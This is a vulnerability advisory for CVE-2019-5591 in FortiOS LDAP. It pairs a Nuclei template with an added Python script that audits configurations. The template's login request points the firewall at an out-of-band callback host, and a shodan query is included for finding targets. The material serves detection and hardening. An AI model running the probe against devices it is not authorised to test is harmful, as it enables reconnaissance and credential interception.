CVE-2019-5591: FortiOS - Insecure LDAP Configuration Detection

Date: 2026-01-08 | Affected software: FortiOS | PoC: public

Vulnerability description

The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions.

PoC code [public]

id: CVE-2019-5591

info:
  name: FortiOS - Insecure LDAP Configuration Detection
  author: ayewo
  severity: medium
  description: |
    The FortiGate LDAP configuration was detected to be insecure due to missing ca-cert, secure LDAPS, or server-identity-check, potentially exposing LDAP communications to credential interception or man-in-the-middle attacks under specific network conditions.
  impact: |
    Unauthenticated attackers can intercept sensitive information by impersonating LDAP servers within the same subnet.
  remediation: |
    Configure LDAP server settings properly and disable default configurations; update to the latest firmware version.
  reference:
    - https://github.com/ayewo/fortios-ldap-mitm-poc-CVE-2019-5591
    - https://www.fortiguard.com/psirt/FG-IR-19-037
  classification:
    cvss-metrics: CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2019-5591
    epss-score: 0.49178
    epss-percentile: 0.9767
    cpe: cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:*
  metadata:
    max-request: 2
    vendor: fortinet
    product: fortigate
    shodan-query: 'cpe:"cpe:2.3:o:fortinet:fortios"'
    tags: cve,cve2019,fortinet,ldap,kev,vkev,oast

variables:
  username: "{{rand_text_alpha(10)}}"
  password: "{{rand_text_alphanumeric(12)}}"

http:
  - raw:
      - |
        GET /login HTTP/1.1
        Host: {{Hostname}}

      - |
        POST /logincheck HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain;charset=UTF-8

        ajax=1&username={{username}}&secretkey={{interactsh-url}}

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - 'name="username"'
          - 'name="secretkey"'
        condition: and

      - type: status
        status:
          - 200

      - type: dsl
        dsl:
          - contains(body_2, "0")
          - contains(body_2, "1")
          - contains(body_2, "2")
        condition: or

      - type: word
        part: body_2
        words:
          - "ajax=1&username="
        condition: or
        negative: true

      - type: word
        part: interactsh_protocol
        words:
          - "dns"
          - "http"
# digest: 4a0a0047304502204c923ca46c268ae26f01497c4c45cbdc0cecfe786b127b870d562c4c98aa4a47022100cd44784ad47ce8b2db3c428e43f9f8a57c531cf72ae514e209d4e05d9f469ece:922c64590222798bb761d5b6d8e72950
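The Nuclei template above detects the issue from the outside by coaxing the firewall into an LDAP lookup against an attacker-chosen name. From the defender's side the same weakness is visible directly in the FortiOS configuration: an entry under `config user ldap` that lacks `set secure ldaps` (or `starttls`), has no `ca-cert`, or does not have `server-identity-check enable`. The following script is an added example, not part of the original page, the Nuclei template, or any Fortinet tooling; it reads `show user ldap` output with a small line-based parser and flags those three settings per server entry. The sample configuration is constructed, and the treatment of a missing key as "not confirmed enabled" is an assumption (FortiOS prints only non-default values, and defaults differ between firmware versions).

```python
"""
Audit FortiOS 'config user ldap' blocks for the weak settings named in
FG-IR-19-037 / CVE-2019-5591: LDAP servers defined without 'secure ldaps'
(or starttls), without a 'ca-cert', or without 'server-identity-check enable'.

Added example, not part of the original page or the Nuclei template; the
parser is a deliberately small line-based reader of FortiOS CLI output, not
vendor tooling. The sample config below is constructed.
"""
import re

# Constructed sample of `show user ldap` output: one weak entry, one hardened entry.
SAMPLE_CONFIG = """\
config user ldap
    edit "corp-ldap-weak"
        set server "10.0.0.5"
        set cnid "sAMAccountName"
        set dn "dc=corp,dc=example"
        set type regular
        set username "cn=svc-bind,dc=corp,dc=example"
        set password ENC placeholder
    next
    edit "corp-ldaps-hardened"
        set server "ldap.corp.example"
        set cnid "sAMAccountName"
        set dn "dc=corp,dc=example"
        set type regular
        set secure ldaps
        set port 636
        set ca-cert "CORP-ROOT-CA"
        set server-identity-check enable
        set username "cn=svc-bind,dc=corp,dc=example"
        set password ENC placeholder
    next
end
"""

SET_RE = re.compile(r'^\s*set\s+(\S+)\s+(.*)$')
EDIT_RE = re.compile(r'^\s*edit\s+"?([^"]+)"?\s*$')


def parse_user_ldap(config_text):
    """Return {server_name: {setting: value}} for every entry in 'config user ldap'.

    Only the 'config user ldap' section is read; any other section is skipped.
    """
    entries = {}
    in_section = False
    current = None
    for line in config_text.splitlines():
        stripped = line.strip()
        if stripped == "config user ldap":
            in_section = True
            continue
        if not in_section:
            continue
        if stripped == "end":
            break
        m = EDIT_RE.match(line)
        if m:
            current = m.group(1)
            entries[current] = {}
            continue
        if stripped == "next":
            current = None
            continue
        m = SET_RE.match(line)
        if m and current is not None:
            key, value = m.group(1), m.group(2).strip().strip('"')
            entries[current][key] = value
    return entries


def audit_entry(settings):
    """Return the list of weaknesses for one LDAP server definition.

    FortiOS prints only non-default values in 'show' output, so a missing key
    is treated as 'not confirmed enabled' (assumption: defaults differ across
    firmware versions, so verify against the running release).
    """
    findings = []
    if settings.get("secure", "disable") not in ("ldaps", "starttls"):
        findings.append("transport is plaintext LDAP (set secure ldaps)")
    if "ca-cert" not in settings:
        findings.append("no ca-cert pinned for the LDAP server certificate")
    if settings.get("server-identity-check") != "enable":
        findings.append("server-identity-check not enabled")
    return findings


def audit_ldap_config(config_text):
    """Map each LDAP server name to its findings (empty list means hardened)."""
    return {name: audit_entry(s) for name, s in parse_user_ldap(config_text).items()}


if __name__ == "__main__":
    for name, findings in audit_ldap_config(SAMPLE_CONFIG).items():
        print(f"[{'OK' if not findings else 'WEAK'}] {name}")
        for finding in findings:
            print(f"    - {finding}")
```

Run it against a saved `show user ldap` dump (replace `SAMPLE_CONFIG` with the file contents) and treat any entry with findings as a candidate for the remediation in the template: `set secure ldaps`, a pinned `ca-cert`, and `server-identity-check enable`.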
